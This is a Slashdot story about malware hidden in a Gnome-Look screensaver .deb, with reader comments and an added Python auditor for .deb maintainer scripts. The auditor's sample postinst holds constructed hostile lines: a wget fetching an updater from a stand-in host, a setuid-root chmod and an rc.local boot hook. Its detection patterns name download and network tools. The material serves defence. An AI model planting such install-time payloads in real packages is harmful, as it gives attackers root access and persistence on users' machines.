Malware Found Hidden In Screensaver On Gnome-Look
AndGodSed writes "OMG! Ubuntu! reports the following: 'Malware has been found hidden inside an innocuous "waterfall" screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instructions on cleansing your system.
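The summary says the .deb "installs a script with elevated privileges": that is what a package's maintainer scripts (preinst/postinst/prerm/postrm) do, since dpkg runs them as root. The following is an added example, not code from the story or from either site, showing how to pull those scripts out of a .deb without installing it and flag the kinds of lines a trojaned package needs (downloads at install time, setuid bits, boot-time hooks). The sample package it builds is constructed for the demonstration; its script contents and the host name are made up and are not the real malware.

```python
"""Inspect a .deb's maintainer scripts before installing it (added example).

A .deb is an `ar` archive holding debian-binary, control.tar.* and data.tar.*.
dpkg runs the maintainer scripts inside control.tar.* as root, so that is
where an install-time payload lives. Everything here is stdlib only.
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# (regex, reason) pairs; heuristics chosen for this example, not an official list
SUSPICIOUS = [
    (r"\b(wget|curl)\b", "downloads content at install time"),
    (r"\bcrontab\b|/etc/cron", "installs a cron job"),
    (r"\b(nc|ncat|hping3?)\b", "network tooling"),
    (r"\bchmod\s+(?:[ugoa]*\+[rwx]*s|[2-7][0-7]{3}\b)", "sets setuid/setgid"),
    (r"/etc/rc\.local|/etc/init\.d/|\bupdate-rc\.d\b", "adds a boot-time hook"),
]


def ar_members(blob: bytes):
    """Yield (name, data) for each member of an `ar` archive (the .deb container)."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    off = 8
    while off + 60 <= len(blob):
        hdr = blob[off:off + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[0:16].decode().rstrip(" /")  # GNU ar terminates names with '/'
        size = int(hdr[48:58].decode().strip())
        yield name, blob[off + 60:off + 60 + size]
        off += 60 + size + (size & 1)  # members are padded to an even offset


def maintainer_scripts(deb: bytes) -> dict:
    """Return {script_name: text} for every maintainer script in the package."""
    scripts = {}
    for name, data in ar_members(deb):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for m in tf.getmembers():
                base = m.name.lstrip("./")
                if m.isfile() and base in MAINTAINER_SCRIPTS:
                    scripts[base] = tf.extractfile(m).read().decode(errors="replace")
    return scripts


def audit(deb: bytes) -> list:
    """Return (script, line_no, reason, line) for each suspicious non-comment line."""
    findings = []
    for script, text in maintainer_scripts(deb).items():
        for lineno, line in enumerate(text.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for pattern, reason in SUSPICIOUS:
                if re.search(pattern, line):
                    findings.append((script, lineno, reason, stripped))
    return findings


# --- helpers to build a constructed sample package offline ---------------------

def tar_gz(files: dict) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), 0o755
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def ar_pack(members) -> bytes:
    out = io.BytesIO()
    out.write(b"!<arch>\n")
    for name, data in members:
        out.write((name + "/").ljust(16).encode() + b"0".ljust(12) + b"0".ljust(6)
                  + b"0".ljust(6) + b"100644".ljust(8)
                  + str(len(data)).ljust(10).encode() + b"`\n" + data)
        if len(data) & 1:
            out.write(b"\n")
    return out.getvalue()


def build_sample_deb() -> bytes:
    """Constructed trojaned-screensaver package; script lines and host are invented."""
    postinst = "\n".join([
        "#!/bin/sh", "set -e",
        "# legitimate part: register the screensaver",
        "cp /usr/share/waterfall/waterfall.desktop /usr/share/applications/screensavers/",
        "# payload: fetch an updater, make it setuid root, start it at boot",
        "wget -q -O /usr/bin/updater.sh http://example.invalid/updater.sh",
        "chmod 4755 /usr/bin/updater.sh",
        "echo '/usr/bin/updater.sh &' >> /etc/rc.local", "",
    ])
    control = "Package: waterfall-screensaver\nVersion: 1.0\nArchitecture: all\n"
    return ar_pack([
        ("debian-binary", b"2.0\n"),
        ("control.tar.gz", tar_gz({"./control": control, "./postinst": postinst})),
        ("data.tar.gz", tar_gz({"./usr/share/waterfall/README": "sample\n"})),
    ])


if __name__ == "__main__":
    for script, n, reason, line in audit(build_sample_deb()):
        print(f"{script}:{n}: {reason}: {line}")
```

On a real file, `audit(open("waterfall.deb", "rb").read())` does the same job; `dpkg-deb --info pkg.deb postinst` is the equivalent one-liner if dpkg is installed, but the point is to read the scripts before dpkg runs them as root, whichever tool prints them. A package from a trusted repository has been signed by the distribution; a .deb from an artwork site has not, so this is the only review it gets.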
Re:Not more safe (Score:5, Informative)
But this is not really about vulnerabilities. This is a screensaver that a user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like the iPhone. And that doesn't really sound good.
Re:Not more safe (Score:5, Informative)
But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from a user account. Historically, malware tried to just fuck over the computer, which would have required root access, but now it's just about sending spam or stealing data.
What the summary didn't mention... (Score:5, Informative)
See pro-linux.de [pro-linux.de] (German).
Re:Repositories! (Score:5, Informative)
No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.
Re:Not more safe (Score:3, Informative)
Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.
Re:At least it was fixable. (Score:1, Informative)
Often Windows viruses use a vulnerability in the OS itself.
In this day and age, if your machine gets compromised by a virus, trojan, or rootkit, the only sensible thing to do is wipe and reinstall from a known clean backup. It doesn't matter what OS it is. There's no telling what other little friends they brought along that your chosen methods of detection didn't find. It's not really an option anymore to keep on going with a system that was compromised.
There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.
Re:Not more safe (Score:3, Informative)
Windows NT 3.5 existed at the same time as Windows 3.1 and had most of the same security features as Windows 7. The NX bit had not been implemented by Intel, so it couldn't support that, and the UAC stuff is not really needed for security. It's just a shortcut for getting admin privs without logging in as admin.
Really, the recent changes in Windows security have been in guiding the user to more secure practices, such as not logging in as admin.
Re:At least it was fixable. (Score:5, Informative)
I'm afraid not. The reason this malware is easy to remove is because it doesn't do anything truly wretched, like patch libc and other applications, install a rootkit kernel module, and the like.
Having dealt with Linux boxes that have been hit by automatic exploitation tools that go well out of their way to hide their presence, I can tell you that no matter what the operating system, the standard advice holds: once the machine is infected, the only sure way to get it back to a known state is to restore from a backup made prior to the exploitation or to wipe it completely and start over. I should also point out that these machines were rooted through the exploitation of previously-patched vulnerabilities in setuid services -- which is the exact same vector many Windows worms use, including Slammer and Conficker.
The only difference between the tools I've run into and a full-on worm is that they run at the command of a cracker and scan IP address ranges of his choice. With a bare amount of automation, they could become very successful Linux worms, breaking into all those machines that, say, have old OpenSSH binaries that haven't been patched against its known remotely exploitable vulnerabilities.
Re:Spot the anachronism (Score:3, Informative)
X-screensavers includes one that is supposed to reverse the LCD equivalent of screen burn. I run it occasionally. It makes the screen flicker, and will probably hospitalise any epileptic who sees it.
Re:Not more safe (Score:3, Informative)
Disclaimer: I'm a tech at a computer repair shop.
Let me guess: she was running as root. This scareware deleted mbam.exe as soon as the installer unpacked it, and/or had a little icon by the clock that popped a notification balloon every time you started a process saying that it (even taskman) was infected with $SCARY_VIRUS_NAME and killed the process.
Since the middle of October, we've had a wave of clients with this stuff, many of whom are running the best AVs (we sell NOD32) and have no idea how they got infected.
Different techs have different favorite ways of removing it, but my personal technique is to create another (limited) user account and start the MBAM installer from there with elevated permissions (using Run As). TADA!
I don't know why the scareware runs with your account permissions, but it sure makes it easy to defeat.
Re:Linux needs a "Zone Alarm" like program (Score:3, Informative)
Linux needs a program that performs the same function as Zone Alarm
It is called Netfilter [netfilter.org] and it is built into the kernel. For low-level configuration, take a look at the iptables command. Several hundred programs offer "simpler" configuration tools, from command line to GUI. Take a look at the L7-filter for application layer packet classification.